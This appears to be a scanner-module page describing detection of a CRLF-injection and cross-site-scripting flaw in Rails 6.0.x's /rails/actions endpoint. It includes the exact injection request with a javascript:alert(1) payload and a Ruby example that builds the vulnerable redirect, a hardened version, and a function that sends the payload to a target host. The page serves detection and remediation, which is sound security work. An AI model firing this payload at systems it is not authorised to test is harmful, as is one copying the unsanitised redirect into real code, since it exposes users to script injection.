Ruby on Rails - CRLF Injection and Cross-Site Scripting

By kannthu

Medium
Vidoc Module
#rails#xss#crlf#hackerone
Description

What is the "Ruby on Rails - CRLF Injection and Cross-Site Scripting" module?

The "Ruby on Rails - CRLF Injection and Cross-Site Scripting" module detects a vulnerability in Ruby on Rails 6.0.0 through 6.0.3.1 in which the "location" parameter of the /rails/actions endpoint is reflected into the resulting redirect response without carriage-return and line-feed characters being stripped. An attacker can therefore split the Location header, inject further response headers, and place a "javascript:" link in the response, which is the cross-site scripting vector. The severity of this vulnerability is classified as medium.

This module was authored by ooooooo_q, rootxharsh, and iamnoooob.

Impact

If exploited, the vulnerability lets an attacker craft a link that makes the affected application return a response containing attacker-chosen headers and JavaScript. A user who follows such a link can have that script executed in the context of the vulnerable site, which can lead to session or data theft and serve as a foothold for further attacks. Upgrading to a Rails release newer than 6.0.3.1 removes the issue.

How does the module work?

The "Ruby on Rails - CRLF Injection and Cross-Site Scripting" module sends a single HTTP request to the target application and evaluates the response against three conditions that must all hold: the string "javascript:alert(1)" appears in the response body, the status code is 302 (a redirect), and the header block contains both "Location: aaaaa" and "text/html". The "Location: aaaaa" check is what proves the injection: the %0a (line feed) in the payload splits the Location value so that "aaaaa" is emitted on its own header line, which cannot happen if the application strips or rejects control characters in the redirect target.

Here is an example of an HTTP request used by the module:

POST /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa

The module reports the vulnerability only when all three conditions are met. A 404, a status other than 302, or a Location header that still carries the payload unsplit means either that the /rails/actions endpoint is not exposed or that the parameter is sanitized, and nothing is reported.
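To make the two halves of the check concrete, here is an added Ruby example (it is not Rails code and not the Vidoc module itself). It reproduces the shape of the vulnerable redirect in a small function, places a hardened version beside it, writes both out as raw HTTP, and evaluates the module's three matching conditions against the raw text. The serializer assumes, as older Rack-based servers did, that a header value containing a line feed is emitted as several header lines of the same name; the check_target helper, the 400 response and the allow-list of redirect targets are my own choices for illustration.

```ruby
require 'cgi'
require 'uri'
require 'socket'

# The "location" value from the module's request, URL-decoded: CR, a
# javascript: URL, a // to comment out what follows, LF, then "aaaaa".
PAYLOAD = "%0djavascript:alert(1)//%0aaaaaa"
LOCATION = URI.decode_www_form_component(PAYLOAD)

# Vulnerable shape (imitation, not the Rails source): the attacker-controlled
# value goes into the Location header as-is and, escaped only for & < > " ',
# into the HTML body. CR and LF pass through both.
def vulnerable_redirect(location)
  body = "<html><body>You are being <a href=\"#{CGI.escapeHTML(location)}\">redirected</a>.</body></html>"
  [302, { "Content-Type" => "text/html; charset=utf-8", "Location" => location }, body]
end

# Hardened shape: reject control characters and anything that is not a local
# path or an http(s) URL before the value can reach a header.
def hardened_redirect(location)
  bad = [400, { "Content-Type" => "text/plain" }, "invalid redirect target"]
  return bad if location.match?(/[\r\n]/)
  begin
    uri = URI.parse(location)
  rescue URI::InvalidURIError
    return bad
  end
  local = uri.scheme.nil? && uri.host.nil? && location.start_with?("/")
  absolute = %w[http https].include?(uri.scheme)
  return bad unless local || absolute
  vulnerable_redirect(location) # safe to reuse once the value is validated
end

REASON = { 302 => "Found", 400 => "Bad Request" }.freeze

# Writes the status/headers/body triple out as raw HTTP. Assumption: a header
# value containing "\n" becomes one header line per piece, which is what turns
# the injected LF into a second "Location: aaaaa" line.
def serialize(status, headers, body)
  lines = ["HTTP/1.1 #{status} #{REASON.fetch(status)}"]
  headers.each do |name, value|
    value.split("\n").each { |piece| lines << "#{name}: #{piece}" }
  end
  lines << "Content-Length: #{body.bytesize}"
  lines.join("\r\n") + "\r\n\r\n" + body
end

# The module's three conditions, ANDed, applied to a raw response string.
def module_matches?(raw)
  head, _sep, body = raw.partition("\r\n\r\n")
  status = head[%r{\AHTTP/1\.[01] (\d{3})}, 1].to_i
  body.include?("javascript:alert(1)") &&
    status == 302 &&
    head.include?("Location: aaaaa") && head.include?("text/html")
end

# Hypothetical live check: sends the module's request over a plain TCP socket
# (no TLS) so the raw header block, split Location line included, is seen
# untouched by an HTTP client library.
def check_target(host, port = 80)
  path = "/rails/actions?error=ActiveRecord::PendingMigrationError" \
         "&action=Run%20pending%20migrations&location=#{PAYLOAD}"
  sock = TCPSocket.new(host, port)
  sock.write("POST #{path} HTTP/1.1\r\nHost: #{host}\r\nContent-Length: 0\r\nConnection: close\r\n\r\n")
  raw = sock.read
  sock.close
  module_matches?(raw)
end

if __FILE__ == $0
  vuln = serialize(*vulnerable_redirect(LOCATION))
  safe = serialize(*hardened_redirect(LOCATION))
  puts "vulnerable shape matches: #{module_matches?(vuln)}"
  puts "hardened shape matches:   #{module_matches?(safe)}"
end
```

Running the file prints true for the vulnerable shape and false for the hardened one; the difference comes entirely from the CR/LF rejection, since the hardened path never lets the line feed reach a header where the server could split it.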

For more information, you can refer to the HackerOne report related to this vulnerability.

Metadata: max-request: 1

Module preview

Concurrent Requests (1)
1. HTTP Request template
POST/rails/actions?error...
Matching conditions
word: javascript:alert(1)
and
status: 302
and
word: Location: aaaaa, text/html
Passive global matcher
No matching conditions.
On match action
Report vulnerability